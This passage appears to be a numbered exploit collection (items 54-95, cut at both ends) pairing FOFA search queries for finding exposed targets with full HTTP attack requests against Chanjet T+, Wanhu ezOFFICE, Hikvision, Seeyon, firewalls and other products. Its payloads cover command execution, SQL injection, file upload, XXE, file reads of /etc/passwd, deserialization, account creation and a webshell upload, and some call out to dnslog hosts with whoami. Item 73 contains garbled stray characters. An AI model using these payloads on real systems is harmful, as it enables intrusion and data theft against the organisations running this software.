/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the packet below to the target; it executes a command that writes the specified string into the specified file
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full packet
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}

Step 2: visit the following URL
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the endpoint
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: using the obtained Cookie, request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo": {
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}

57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. Baizhuo Smart management platform importexport.php SQL injection
FOFA:title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. Zheda Ente customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA:"IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then request:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA:icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. Jiecheng management information system CWSFinanceCommon SQL injection
FOFA:body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

65. Youkate Lianaiyun (face-recognition) smart management platform 1.0.55.0.0.1 permission bypass
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 was created.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. Wanhu ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA:app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

If lines 42 and 43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9, the vulnerability is present.

67. Wanhu ezOFFICE wpsservlet arbitrary file upload
FOFA:app="万户网络-ezOFFICE"
The newdocId and filename parameters set the name of the written file, dir sets the directory it is written to, and fileType sets the file type.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The uploaded file is served at /defaultroot/platform/portal/layout/apoxkq.jsp

68. Wanhu ezOFFICE wf_printnum.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. Wanhu ezOFFICE contract_gd.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. Wanhu ezEIP success command execution
FOFA:app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. Bangyong PM2 project management system Global_UserLogin.aspx SQL injection
FOFA:body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. Seeyon OA getAjaxDataServlet XXE
FOFA:app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

( V) q" Y2 Q/ r; r73. GeoServer wms远程代码执行& `) V& [; e% `9 h1 M1 a" [
FOFA:icon_hash=”97540678”
1 t" N5 \! U- _0 x3 l8 YPOST /geoserver/wms HTTP/1.1
8 U4 Z7 l4 `8 t- v% q9 k4 D+ eHost:* p4 W! }3 u" b# T
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36" Z/ B- W/ f; y5 C9 T5 t
Content-Length: 1981
' c$ j8 J3 V8 ~5 IAccept-Encoding: gzip, deflate  ^3 F1 F2 _" B2 N
Connection: close
+ W  k+ B+ l9 B3 EContent-Type: application/xml2 S5 j$ E: c' ?* ?/ c# S+ [' w& k
SL-CE-SUID: 30 j6 z5 v$ v( z/ H  \

$ E' g8 y( [: R. Z7 |; U; jPAYLOAD( \- I8 _! r( k0 ]4 e
& X+ ?) I1 i4 _% u3 M

74. Seeyon M3-Server 6_1sp1 deserialization RCE
FOFA:title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA:app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. Newcapec Zhangshang Xiaoyuan (campus) service management platform service.action remote command execution
FOFA:title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 garment management software system UploadHandler.ashx arbitrary file upload
FOFA:body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction engineering quality supervision system FileUpload.ashx file upload
FOFA:icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE Baiwei traffic-control router remote command execution
FOFA:BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. Suda Tianyao software DesignReportSave.jsp interface arbitrary file upload
FOFA:app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. Uniview video surveillance main-cgi password disclosure
FOFA:app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. Sifudi LOGBASE operations security management system test_qrcode_b remote command execution
FOFA:app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA:body="sysaid-logo-dark-green.png"
The exploit request is as follows; it injects a Godzilla webshell.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Result URL: http://x.x.x.x/userfiles/index.jsp

86. Japanese tosei self-service laundry machine RCE
FOFA:body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. DBAPPSecurity Mingyu security gateway aaa_local_web_preview file upload
FOFA:title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

/jfhatuwe.php

88. DBAPPSecurity Mingyu security gateway aaa_portal_auth_config_reset remote command execution
FOFA:title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

/astdfkhl.php

89. Seeyon FE collaborative office platform editflow_manager SQL injection
FOFA:title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. Hikvision IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA:icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA:title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. Hikvision operations management center session command execution
Fastjson command execution
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. Qi-Anxin Wangshen SecGate3600 firewall app_av_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. QiAnXin Legendsec SecGate3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
